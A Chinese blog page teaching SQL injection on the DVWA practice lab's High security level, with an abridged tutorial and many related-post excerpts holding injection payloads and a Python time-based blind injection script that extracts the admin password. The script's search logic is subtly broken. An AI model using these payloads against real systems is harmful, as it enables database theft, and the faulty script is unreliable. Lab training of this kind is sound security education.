深入理解MySQL安全(四)-DVWA High security SQL注入方法

已于 2023-02-16 22:01:51 修改
阅读量256 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试提升之道 文章标签: 网络安全 数据库 mysql
于 2023-02-15 23:10:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhujiu_fu/article/details/129049791
本文深入探讨了DVWA中High security级别的MySQL SQL注入思路与方法,包括利用LIMIT限制构造注入、通过错误信息判断列数以及sqlmap的注入技巧。通过对两次请求的组合,展示了如何进行有效注入。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

前面完成了low,miedia level sql的注入的思路和方法,本章继续讲解high level sql注入的思路及方法。

一、MySQL注入思路

(1)首先输入1正常返回数据,然后1 or 1=1 构造True。发现返回的还是和输入1是一样的。

 核心在于服务端做了返回限制,引入了LIMIT限制,返回 N 条记录,这里限制为1

(2) 加上 ' 来初步判断,发现如下报错。

(3) 既然,有报错,尝试or 语法,绕过前面的报错,并成功获取所有数据。 

了解本专栏 订阅专栏 解锁全文 超级会员免费看
深入理解MySQL安全(三)-DVWA medium SQL注入方法
zhujiu_fu的博客
02-14 281
DVWA medium SQL注入的思路与方法
DVWA靶场SQL注入实测笔记(小白自查)-LOW SECURITY
2401_83237906的博客
04-06 1186
所以联想到把0x7e换成database()是不是也能正常返回值,经过尝试,发现返回空,没报错都,所以这个0x7e不敢丢,直接加也不行,加逗号也不行(两个位置放3个参数),怎么合在一起,把两列变成一列?
SQL注入高级进阶
06-04
SQL注入高级进阶
DVWA sql注入high
gclome的博客
07-05 5181
有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' order by 2# 输入1' order by 3# 由此可见,字段数是2, 我觉得所谓high等级较前两个的区别就是出错了之后,不再提醒错误原因,只显示Something went wrong. 3...
DVWA sql注入-HIGH
m0_46616663的博客
05-26 297
1.判断是否存在sql注入漏洞 看到Click [here to change your ID]页面做了自动跳转,防御了自动化的sql注入 出现报错,存在sql注入 2.判断注入漏洞的类型 不是数字型注入 可以看到这个为字符型注入 3.猜解数据库 猜解并验证列数 数据库字段为2 获取数据库信息 查询用户名和数据库名 爆表名 爆出users中的字段名 获取字段中的user和password ...
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 2163
sqlmap测试dvwa-sql注入high
网络安全DVWASQL注入High level解题简析
热门推荐
等风来
04-24 1万+
由以上两个回显可知,该注入类型为字符型注入。由以上两个回显可知,注入点个数为两个。查看是否存在注入点,爆库名,爆表名,爆列名,爆字段。
DVWA通过攻略之SQL注入
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
在这个实验中,我们将深入理解SQL注入的盲注类型,并学习如何使用sqlmap工具进行自动化探测和利用。 一、SQL注入-盲注 1. 盲注的基本原理是通过观察应用程序的响应时间或者返回结果的微妙变化来判断SQL查询的结果...
DVWA--SQL注入(SQL Injection)--HIgh
JakeLin's Blog
06-16 466
DVWA--SQL注入(SQL Injection)--Low DVWA--SQL注入(SQL Injection)--Medium 级别:High 实际和Low级别一样,进行SQL注入,参考Low 后台源码 <?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION[ 'id' ]; // Check database $query = "SELECT ..
DVWA sql注入(低中高)
m0_73581247的博客
04-08 553
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
SQL Server Security
Experience set us apart!
12-01 786
SQL Server 2008中的安全分为 Server Principal 和 Database Principal 两级,Server Pricipal 可以通过select * from sys.server_principal 获得,Database Principal可以通过select * from sys.database_principal.1.      create
HCIE-Security安全-SQL
qq_44667101的博客
04-06 914
文章目录SQL基本概念基本操作(1)进入MySQL监视器(2)修改支持中文(3)查看所有数据库名(4)进入某个数据库(5)查看数据库中的所有表一、查询语句(1)查询users表中的所有数据(2)查询users表中“username”等于“admin”的数据二、插入(增加)语句三、修改(更新)语句、删除语句五、order by语句六、union联合查询 SQL 基本概念 SQL(Structure...
mysql sql security_MySQL中的DEFINER与SQL SECURITY
weixin_29333353的博客
01-19 556
今天测试项目时,连接远程Mysql数据库项目正常运行,把远程数据库拷贝到本地数据库,项目无法登陆,一直考虑是同步数据库出了问题。确认几遍后发现数据没问题。最后发现是某条sql出现问题指定定义者的用户不存在。而该sql中调用了视图,最后才发现是视图权限问题,运行sql报The user specified as a definer ('xxx'@'%') does not exist。指定定义者的用...
DVWA(7)SQL注入(SQL Injection) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 468
今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的。
DVWA-SQL注入
WY92139010的博客
05-03 1078
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWA靶场通关笔记-SQL注入(SQL Injection low级别)
mooyuan的网络安全博客
07-07 720
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA系列】——SQL注入——High详细教程
最新发布
2402_84408069的博客
07-10 1133
摘要:本文详细解析DVWA SQL注入High级别的攻防要点。High级别采用LIMIT 1限制和会话分离机制防御,但未过滤单引号。通过手工注入可绕过限制:1)判断为字符型注入需闭合单引号;2)用#注释绕过LIMIT 1;3)通过Union查询逐步获取库名、表名及用户密码(MD5加密)。关键技巧包括注释符使用、负数ID和子查询。防御设计存在局限性,未过滤注释符导致仍可注入。文末强调合法授权测试的重要性,并附免责声明。仅供安全研究,禁止非法用途。(150字)
dvwa靶场SQL Injection(sql注入)全难度教程(附代码分析)
m0_73248913的博客
04-04 1214
dvwa sql注入教程
dvwa high sql注入
03-21
DVWA (Damn Vulnerable Web Application) 是一款用于安全测试练习的Web应用程序,它包含了各种各样的漏洞供用户学习如何利用以及修复它们。对于高难度级别的SQL注入挑战(DVWA High SQL Injection),程序增加了基本的安全措施如输入过滤、字符转义等。 ### DVWA HIGH 级别 SQL 注入解析 #### 防护机制特点 在这个级别上,默认会启用 PHP 的 `mysql_real_escape_string` 函数来对用户的输入进行处理。该函数可以将特殊字符转换成其对应的转义序列,例如单引号 `'` 转换成 `\'` 。这一功能有效防止了大部分简单的字符串拼接型攻击向量。 然而即便如此,仍然存在某些技巧绕过这种基础防御层: 1. **时间盲注** 即使无法直接从页面获取反馈信息,也可以通过测量服务器响应延迟推测查询结果是否满足条件。比如构造类似下面这样的payload: ```sql admin' AND SLEEP(5)-- ``` 2. **基于错误的信息泄露** 如果系统配置允许显示详细的数据库报错消息,则有可能提取出有用的数据片段。尽管此路在HIGH模式下通常被封锁掉了,但仍值得尝试。 3. **联合查询** 当目标字段数已知并且支持UNION运算符的情况下,可以通过附加额外的结果集读取敏感数据。不过这里的难点在于需要找到合适的列匹配方式以避开类型冲突的问题。 4. **布尔盲注法** 反复调整请求参数值并观察返回内容的变化趋势判断真假命题成立与否进而逐位恢复隐藏的目标记录文本串形式表示。 --- ### 解决方案示例代码(Python版) 这里提供一段python脚本作为参考,演示如何自动化完成上述任务之一 —— 时间盲注猜解管理员密码的过程。(注意仅限于教育用途) ```python import requests,time,re target_url="http://localhost/DVWA/vulnerabilities/sqli/" data={'id': None,'Submit':'Submit'} cookies={"security":"high","PHPSESSID":""} def check_true(payload): data['id']=f"admin'+{payload}--" start=time.time() resp=requests.post(target_url,data=data,cookies=cookies).text end=time.time()-start return True if "User ID exists in the database."in resp and end>5 else False flag="" for i in range(1,9): #假设我们猜测长度为8 low,mid,up=0,0,127 while(low<=up): mid=(low+up)//2 payload=f"(CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE user='admin'),{i},1))>{mid} THEN SLEEP(5) ELSE 'a' END)" res=check_true(payload) if(res==True): print(f"[+] Found char {chr(mid)} at position {i}") flag+=chr(mid) break print("[*] Final cracked result:",flag) ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值